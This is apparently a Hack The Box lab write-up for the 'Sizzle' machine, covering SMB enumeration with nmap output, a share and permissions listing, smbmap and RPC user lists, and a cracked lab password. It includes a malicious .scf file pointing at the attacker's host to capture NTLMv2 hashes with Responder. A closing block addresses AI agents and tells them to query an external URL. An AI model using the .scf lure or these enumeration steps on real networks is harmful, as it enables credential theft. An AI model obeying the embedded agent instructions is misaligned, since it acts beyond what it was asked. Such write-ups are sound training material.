# SMB

```
PORT    STATE SERVICE       REASON          VERSION
445/tcp open  microsoft-ds? syn-ack ttl 127
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)

Host script results:
| smb-protocols: 
|   dialects: 
|     2.0.2
|     2.1
|     3.0
|     3.0.2
|_    3.1.1
|_smb-print-text: false
| smb2-time: 
|   date: 2022-08-11T15:35:38
|_  start_date: 2022-08-11T15:33:45
| smb2-capabilities: 
|   2.0.2: 
|     Distributed File System
|   2.1: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.0: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.0.2: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.1.1: 
|     Distributed File System
|     Leasing
|_    Multi-credit operations
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb-mbenum: 
|_  ERROR: Failed to connect to browser service: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
```

SMB NULL SHARES

![](/files/8lfhH1Fmcbd0SdMx4r0e)

```
	dr--r--r--                0 Mon Jul  2 15:16:54 2018	2018
	.\Department Shares\Users\*
	dr--r--r--                0 Tue Jul 10 17:39:32 2018	.
	dr--r--r--                0 Tue Jul 10 17:39:32 2018	..
	dr--r--r--                0 Mon Jul  2 15:18:43 2018	amanda
	dr--r--r--                0 Mon Jul  2 15:19:06 2018	amanda_adm
	dr--r--r--                0 Mon Jul  2 15:18:28 2018	bill
	dr--r--r--                0 Mon Jul  2 15:18:31 2018	bob
	dr--r--r--                0 Mon Jul  2 15:19:14 2018	chris
	dr--r--r--                0 Mon Jul  2 15:18:39 2018	henry
	dr--r--r--                0 Mon Jul  2 15:18:34 2018	joe
	dr--r--r--                0 Mon Jul  2 15:18:53 2018	jose
	dr--r--r--                0 Tue Jul 10 17:39:32 2018	lkys37en
	dr--r--r--                0 Mon Jul  2 15:18:48 2018	morgan
	dr--r--r--                0 Mon Jul  2 15:19:20 2018	mrb3n
	dr--r--r--                0 Wed Sep 26 01:45:32 2018	Public
```

Was able to get a list of other users who I might be able to roast.&#x20;

Unfortunately for us kerberos isnt open to the public therefore that is why we were unable to execute AESEPRoast attacks.&#x20;

However after mounting hte share we were able to see the users and the permissions to these folders.&#x20;

Using the followowing Script&#x20;

```
tput civis; for directory in $(ls); do echo -e "\n [*] Enumerating Permissions in the $directory:\n"; echo -e "\t$(smbcacls "//10.10.10.103/Department Shares" Users/$directory -N | grep "Everyone")"; done; tput cnorm
[*] Enumerating Permissions in the Public:

	ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ

```

Since we have write acess to the Public folder there is many ways that we coudl get a shell out of this, we coudl possibly steal hashes as well as possibly putting files like an hta file.

After starting responder and placing the following .scf file I was able to capture NTLMv2 Hashes.

```
[Shell]
Command=2
IconFile=\\10.10.14.7\home\kali\driver.scf
[Taskbar]
Command=ToggleDesktop
```

![](/files/uKg9CPIjw5wUqAWp4PBk)

Now we can try to enumerate again with these credentials and start all over. The password was Ashare1972.&#x20;

* [x] cme
* [x] winrm
* [x] psexec
* [x] ldap
* [ ] rpc
* [ ] smbshare
* [x] kerberosroast

```
smbmap -H 10.10.10.103 -u 'amanda' -p 'Ashare1972'       
[+] IP: 10.10.10.103:445	Name: HTB.LOCAL                                         
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	CertEnroll                                        	READ ONLY	Active Directory Certificate Services share
	Department Shares                                 	READ ONLY	
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Operations                                        	NO ACCESS	
	SYSVOL                                            	READ ONLY	Logon server share 

```

We could have additional permisisons to access other shares.

RPC&#x20;

user:\[Administrator] rid:\[0x1f4] user:\[Guest] rid:\[0x1f5] user:\[krbtgt] rid:\[0x1f6] user:\[DefaultAccount] rid:\[0x1f7] user:\[amanda] rid:\[0x450] user:\[mrlky] rid:\[0x643] user:\[sizzler] rid:\[0x644]


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://lyethar.gitbook.io/sizzle/enumeration/other-services/smb.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.